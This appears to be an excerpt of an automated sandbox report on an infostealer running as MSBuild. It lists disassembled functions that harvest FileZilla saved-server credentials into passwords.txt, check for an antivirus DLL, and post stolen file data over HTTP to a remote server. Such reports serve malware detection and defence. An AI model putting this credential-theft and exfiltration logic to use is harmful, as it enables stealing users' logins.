                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocateNameProcessUser
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1296208442-0
                                                                                                                                                                                                                      • Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                                                                                                                                      • Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34
                                                                                                                                                                                                                      Function 00410FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2452939696-0
                                                                                                                                                                                                                      • Opcode ID: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                                                                                                                                                      • Instruction ID: 6e5c45132ae1b45d6529ef5bd4d0c5c9796b2e2d3bf3e93bb3fd0621c026135a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8E092B0D1020D9BCF04DF60EC459DE77FCEB08208F4055B5A505E3180D674AB89CF44
                                                                                                                                                                                                                      Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcmpi
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1586166983-0
                                                                                                                                                                                                                      • Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                                                                                                                      • Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C
                                                                                                                                                                                                                      Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573stringnetworkmemoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 29 405482-405593 call 4104e7 call 410519 call 404ab6 call 411e5d lstrlenA call 411e5d call 4104e7 * 4 StrCmpCA 48 405595 29->48 49 40559b-4055a1 29->49 48->49 50 4055a3-4055b8 InternetOpenA 49->50 51 4055be-4056ce call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 4105c7 call 410609 call 41058d call 402920 * 3 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 49->51 50->51 52 405e64-405eec call 402920 * 4 call 410519 call 402920 * 3 50->52 51->52 118 4056d4-405712 HttpOpenRequestA 51->118 86 405eee-405f2e call 402920 * 6 call 41d016 52->86 119 405e58-405e5e InternetCloseHandle 118->119 120 405718-40571e 118->120 119->52 121 405720-405736 InternetSetOptionA 120->121 122 40573c-405d77 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA HttpQueryInfoA 120->122 121->122 309 405db5-405dc5 call 411afd 122->309 310 405d79-405db0 call 4104e7 call 402920 * 3 122->310 316 405dcb-405dd0 309->316 317 405f2f 309->317 310->86 319 405e11-405e2e InternetReadFile 316->319 321 405e30-405e43 StrCmpCA 319->321 322 405dd2-405dda 319->322 324 405e45-405e46 ExitProcess 321->324 325 405e4c-405e52 InternetCloseHandle 321->325 322->321 326 405ddc-405e0c call 410609 call 41058d call 402920 322->326 325->119 326->319
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                                                                                                                        • Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
                                                                                                                                                                                                                        • Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
                                                                                                                                                                                                                        • Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                                                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
                                                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,433cd71b7a2bdd3668a493b00ee95630,",build_id,00437814,------), ref: 00405C67
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00405C7A
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00405C99
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00405CA6
                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00405CB4
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00405CD6
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00405CE4
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00405D05
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
                                                                                                                                                                                                                      • HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
                                                                                                                                                                                                                      • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00405E46
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                                                                      • String ID: ------$"$"$"$"$--$------$------$------$------$433cd71b7a2bdd3668a493b00ee95630$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                                                      • API String ID: 2638065154-1387777635
                                                                                                                                                                                                                      • Opcode ID: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
                                                                                                                                                                                                                      • Instruction ID: a1f310b16752a75a1e3861b17425502ee47d614580a36b5f1e1f8e1f13a41955
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3742E671D401699BDF21FB21DC45ACDB3B9BF04308F0085E6A548B3152DAB86FCA9F98
                                                                                                                                                                                                                      Function 0040E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289stringmemoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                                                                        • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0040E77E
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E7EA
                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E829
                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E862
                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E89B
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040E901
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040E915
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D
                                                                                                                                                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                                                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                      • API String ID: 4146028692-935134978
                                                                                                                                                                                                                      • Opcode ID: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
                                                                                                                                                                                                                      • Instruction ID: 2e9f852a615408e756f1d7d3730d5668bfc6bf7d6dc94c0724fe4efb67adb4f0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FA17572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99
                                                                                                                                                                                                                      Function 00406BB5 Relevance: 63.6, APIs: 20, Strings: 16, Instructions: 598networkstringmemoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 451 406bb5-406c7a call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 466 406c82-406c88 451->466 467 406c7c 451->467 468 40763e-407666 InternetCloseHandle call 408048 466->468 469 406c8e-406e18 call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 466->469 467->466 474 4076a5-40773e call 402920 * 4 call 401cde call 402920 * 3 call 41d016 468->474 475 407668-4076a0 call 410549 call 410609 call 41058d call 402920 468->475 469->468 549 406e1e-406e58 HttpOpenRequestA 469->549 475->474 550 407632-407638 InternetCloseHandle 549->550 551 406e5e-406e64 549->551 550->468 552 406e82-4075cf call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA 551->552 553 406e66-406e7c InternetSetOptionA 551->553 792 407611-407629 InternetReadFile 552->792 553->552 793 4075d1-4075d9 792->793 794 40762b-40762c InternetCloseHandle 792->794 793->794 795 4075db-40760c call 410609 call 41058d call 402920 793->795 794->550 795->792
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 00406C72
                                                                                                                                                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,",status,00437998,------,0043798C,",task_id,00437978,------,0043796C,",mode,00437958,------,0043794C), ref: 0040753C
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040754B
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0040755D
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040756A
                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00407578
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00407586
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 004075A1
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
                                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040762C
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00407638
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00407644
